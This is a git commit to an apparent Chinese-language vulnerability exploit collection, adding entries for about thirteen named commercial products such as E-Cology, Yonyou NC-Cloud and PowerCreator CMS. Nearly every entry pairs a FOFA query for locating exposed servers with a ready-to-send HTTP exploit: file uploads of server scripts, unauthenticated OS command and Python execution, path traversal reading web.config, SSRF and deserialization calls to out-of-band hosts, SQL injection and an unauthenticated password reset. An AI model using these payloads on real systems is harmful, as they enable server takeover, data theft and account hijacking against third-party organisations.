7.12更新漏洞

This commit is contained in:
wy876 2024-07-12 09:22:31 +08:00
parent c8b3f32429
commit 33aeb58103
16 changed files with 454 additions and 2 deletions

View File

@ -0,0 +1,37 @@
## PowerCreator接口UploadResourcePic.ashx存在任意文件上传漏洞
PowerCreator接口 UploadResourcePic.ashx存在任意文件上传漏洞。攻击者可利用该漏洞上传webshell获得服务器权限。
## fofa
```yaml
app="PowerCreator-CMS"
```
![image-20240711194543726](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111945851.png)
## poc
```yaml
POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1517.3.1 Ddg/17.3.1
Connection: close
Content-Length: 246
Content-Disposition: form-data;name="file1";filename="poc.aspx";
Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136
Accept-Encoding: gzip, deflate
-----------------------------20873900192357278038549710136
Content-Disposition: form-data; name="file1"; filename="111.aspx"
Content-Type: image/jpeg
11111
-----------------------------20873900192357278038549710136--
```
![image-20240711194442981](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111944029.png)
文件路径 `http://127.0.0.1/ResourcePic/ODM4Mg==.ASPX`
![image-20240711194519399](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111945443.png)

View File

@ -0,0 +1,26 @@
## Pyspider-WebUI未授权访问致远程代码执行漏洞
由于Pyspider WebUI未进行合理的访问控制默认允许远程攻击者未授权访问webui界面且系统内部存在python脚本在线编辑并运行的模块导致未经身份验证的攻击者可远程执行python代码调用系统命令来获取服务器权限。
## fofa
```yaml
title="Dashboard - pyspider"
```
## poc
```yaml
POST /debug/任意实例名/run HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Connection: close
webdav_mode=false&script=import+os%0D%0A%0D%0Aprint%28os.system%28%27执行的命令%27%29%29&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407092258892.png)

View File

@ -1,6 +1,22 @@
# 漏洞收集
收集整理漏洞EXP/POC,大部分漏洞来源网络目前收集整理了700多个poc/exp善用CTRL+F搜索
## 2024.07.12 新增漏洞
- 泛微E-Cology接口getFileViewUrl存在SSRF漏洞
- Pyspider-WebUI未授权访问致远程代码执行漏洞
- 赛蓝企业管理系统DownloadBuilder任意文件读取漏洞
- 上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞
- 同享人力管理管理平台DownloadFile存在任意文件下载漏洞
- 北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞
- 用友NC-Cloud接口blobRefClassSea存在反序列化漏洞
- 慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞
- 虚拟仿真实验室系统FileUploadServlet存在任意文件上传漏洞
- 风速科技统一认证平台存在密码重置漏洞
- 联奕统一身份认证平台getDataSource存在信息泄露漏洞
- PowerCreator接口UploadResourcePic.ashx存在任意文件上传漏洞
- 数字通OA-智慧政务接口payslip存在SQL注入漏洞
## 2024.07.09 新增漏洞
- 申瓯通信在线录音管理系统Thinkphp远程代码执行漏洞

View File

@ -0,0 +1,21 @@
## 上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞
上海上讯信息技术股份有限公司运维管理系统 `/emailapply/RepeatSend`存在命令执行漏洞,获取服务器权限。
## fofa
```
body="default/getloginhtml"
```
## poc
```yaml
POST /emailapply/RepeatSend HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.850.86 Safari/537.36
id='%0aping dnslog.cn%0a'
```

View File

@ -3,7 +3,7 @@
## fofa
```
body="/him/api/rest/v1.0/node/role
body="/him/api/rest/v1.0/node/role"
```
## poc

View File

@ -0,0 +1,37 @@
## **北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞**
北京中科聚网信息技术有限公司的一体化运营平台是一个综合性的信息系统旨在为企业或机构提供全方位的运营支持和管理服务。北京中科聚网信息技术有限公司一体化运营平台importVisualModuleImg接口存在文件上传漏洞攻击者可利用此漏洞上传任意文件获取服务器权限。
## fofa
```yaml
title="一体化运营平台" || body="thirdparty/ueditor/WordPaster"
```
## poc
```yaml
POST /manage/tplresource/importVisualModuleImg?moduleId=2 HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----9979a3f1-cdb1-43af-af88-a9b48b67cf71
Content-Length: 198
Cookie: JSESSIONID=9438c497-92ad-4800-b821-20602adec4ac; rememberMe=dcOzuzCzFrtr02GhN9IwcsR9v759kvzO9wq/upEQ0jwsU5y/25kFW52CaKmZoRP7pwH979ifBBXB3b+li3PSXwZmxnh+bMgi6kv5vv8WNkNdy1pblj7sPxtwIm71auJPyyOl+aMKAhk/71leMQLpneRk/8f6USYL/acFuWhpjyuVU6oP6YJdIoCKGgdxAiUk;
------9979a3f1-cdb1-43af-af88-a9b48b67cf71
Content-Disposition: form-data; name="file"; filename="tmp.jsp"
Content-Type: multipart/form-data
6666
------9979a3f1-cdb1-43af-af88-a9b48b67cf71--
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407101850568.png)

View File

@ -0,0 +1,39 @@
## **同享人力管理管理平台DownloadFile存在任意文件下载漏洞**
同享软件成立于1997年运营中心位于东莞南城南新产业国际。专注研发和推广人力资源信息化产品帮助企业构建统一的人力资源数智化平台快速提高企业人才管理能力提升人力资源管理效率帮助员工快速成长协助企业实现智慧决策。同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞
## fofa
```yaml
body="/Assistant/Default.aspx"
```
## poc
```yaml
POST /Service/DownloadTemplate.asmx HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: ASP.NET_SessionId=f40br0ilcoosnxgllqrmltkd
Upgrade-Insecure-Requests: 1
Priority: u=1
SOAPAction: http://tempuri.org/DownloadFile
Content-Type: text/xml;charset=UTF-8
Host:
Content-Length: 310
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:DownloadFile>
<!--type: string-->
<tem:path>../web.config</tem:path>
</tem:DownloadFile>
</soapenv:Body>
</soapenv:Envelope>
```
![image-20240710184711192](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407101847260.png)

View File

@ -0,0 +1,42 @@
## **慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞**
慧学教育科技有限公司Campuswit uploadFiles存在任意文件上传漏洞攻击者可通过该漏洞获取服务器权限。
## fofa
```yaml
body="campuswit"
```
## poc
```yaml
POST /v1/public/uploadFiles HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 412
--00content0boundary00
Content-Disposition: form-data; name="keep_filename"
1
--00content0boundary00
Content-Disposition: form-data; name="check_file"
1
--00content0boundary00
Content-Disposition: form-data; name="campuswitHash"
campuswit_hash_success
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: text/php
1234
--00content0boundary00--
```
![image-20240711184311236](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111843311.png)

View File

@ -0,0 +1,25 @@
## 数字通OA-智慧政务接口payslip存在SQL注入漏洞
中科数字通北京科技有限公司全新架构的智慧办公系统由9大类、50多个主要功能模块构成。旨在为组织单位内部提供全新一代智慧型协同办公系统数字通指尖云平台-智慧政务存在SQL注入漏洞可通过SQL注入可获取敏感信息。
## fofa
```yaml
暂无语法
```
## poc
```yaml
GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: GOASESSID=i589f58naalabocmbidup7edl3
Upgrade-Insecure-Requests: 1
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111952197.png)

View File

@ -29,7 +29,6 @@ Upgrade-Insecure-Requests: 1
<pub:savePic soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<filepath xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">zkimvsrr.jsp</filepath>
<bytes xsi:type="soapenc:base64Binary" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">PCUgb3V0LnByaW50bG4oMTExKjExMSk7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPg==</bytes>
</pub:savePic>
</soapenv:Body>
</soapenv:Envelope>

View File

@ -0,0 +1,68 @@
# 泛微E-Cology接口getFileViewUrl存在SSRF漏洞
泛微E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口获取服务的banner信息窥探网络结构甚至对内网或本地运行的应用程序发起攻击获取服务器内部敏感配置造成信息泄露。
## fofa
```yaml
app="泛微-OAe-cology"
```
## poc
```yaml
POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Upgrade-Insecure-Requests: 1
{
"file_id": "1000",
"file_name": "c",
"download_url":"http://euixlkewfg.dgrh3.cn"
}
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407092255733.png)
## afrog poc
```yaml
id: 泛微E-Cology接口getFileViewUrl存在SSRF漏洞
info:
name: 泛微E-Cology接口getFileViewUrl存在SSRF漏洞
author: wy876
severity: high
verified: true
description: |-
泛微E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口获取服务的banner信息窥探网络结构甚至对内网或本地运行的应用程序发起攻击获取服务器内部敏感配置造成信息泄露。
Fofa: app="泛微-OAe-cology"
reference:
- https://blog.csdn.net/qq_41904294/article/details/140301289
tags: 泛微,ssrf
created: 2024/07/10
set:
oob: oob()
oobHTTP: oob.HTTP
oobDNS: oob.DNS
rules:
r0:
request:
method: POST
path: /api/doc/mobile/fileview/getFileViewUrl
headers:
Content-Type: application/json
body: |
{"file_id": "1000","file_name": "c","download_url":"{{oobHTTP}}"}
expression: response.status == 200 && oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()
```

View File

@ -0,0 +1,26 @@
## 用友NC-Cloud接口blobRefClassSea存在反序列化漏洞
用友NC Cloud接口 /ncchr/pm/ref/indiIssued/blobRefClassSearch 存在反序列漏洞。
## fofa
```yaml
app="用友-NC-Cloud"
```
## poc
```yaml
POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
Content-Type: application/json
Host:
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"DNSLOG.COM\"}}}"}
```

View File

@ -0,0 +1,25 @@
## 联奕统一身份认证平台getDataSource存在信息泄露漏洞
联奕统一身份认证平台getDataSource 未授权访问,攻击者可通过此漏洞获取敏感信息。
## fofa
```yaml
icon_hash="772658742"
```
## poc
```yaml
POST /api/bd-mdp/serviceManager/outInterface/getDataSource HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Transfer-Encoding: chunked
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
0
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111939955.png)

View File

@ -0,0 +1,38 @@
## **虚拟仿真实验室系统FileUploadServlet存在任意文件上传漏洞**
北京润尼尔科技股份有限公司原北京润尼尔网络科技有限公司以下简称“润尼尔或公司”于2007年12月成立实缴注册资本2483万是一家在北京石景山区注册的国家高新技术企业、北京市专精特新企业四届蝉联 “中国VR50强企业”。目前在武汉、西安、上海、成都、合肥、哈尔滨等地设立了分支机构。公司以虚拟仿真技术和网络技术为依托面向各类学校提供集虚拟仿真教学资源、管理平台和虚拟现实设备为一体的“VR+教育”整体解决方案旨在提高学生的实践动手能力助力学校提高人才培养质量。北京润尼尔科技股份有限公司虚拟仿真实验室系统FileUploadServlet存在任意文件上传漏洞攻击者可通过该漏洞获取服务器权限。
![image-20240711190816566](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111908243.png)
## fofa
```yaml
body="virexp/s"
```
## poc
```yaml
POST /chatroom/FileUploadServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=D608C8AF5AC63FB5DA57B858CFC42B42
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGIc4ig8R
Content-Length: 153
------WebKitFormBoundaryGIc4ig8R
Content-Disposition: form-data; name="aaa"; filename="1234.jsp"
<% out.println("testqqww"); %>
------WebKitFormBoundaryGIc4ig8R--
```
![img](https://cdn.nlark.com/yuque/0/2024/png/10358436/1720276416352-970a7928-f599-4645-b0d5-bf1c33db5b8c.png?x-oss-process=image%2Fwatermark%2Ctype_d3F5LW1pY3JvaGVp%2Csize_9%2Ctext_5pif5oKm5a6J5YWo%2Ccolor_FFFFFF%2Cshadow_50%2Ct_80%2Cg_se%2Cx_10%2Cy_10%2Fformat%2Cwebp)
文件路径`/chatroom/uploadFile/1234.jsp`

View File

@ -0,0 +1,23 @@
# 赛蓝企业管理系统DownloadBuilder任意文件读取漏洞
赛蓝企业管理系统 DownloadBuilder 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
## fofa
```yaml
body="www.cailsoft.com" || body="赛蓝企业管理系统"
```
## poc
```yaml
GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407092300242.png)

View File

@ -0,0 +1,30 @@
## 风速科技统一认证平台存在密码重置漏洞
河南省风速科技统一认证平台,存在未授权漏洞,攻击者可通过该接口重置任意密码。
## fofa
```yaml
body="/cas/themes/zbvc/js/jquery.min.js"
```
![image-20240711192731504](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111927560.png)
## poc
```yaml
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close
{"xgh":"test","newPass":"test666","email":""}
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111927185.png)
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111928817.png)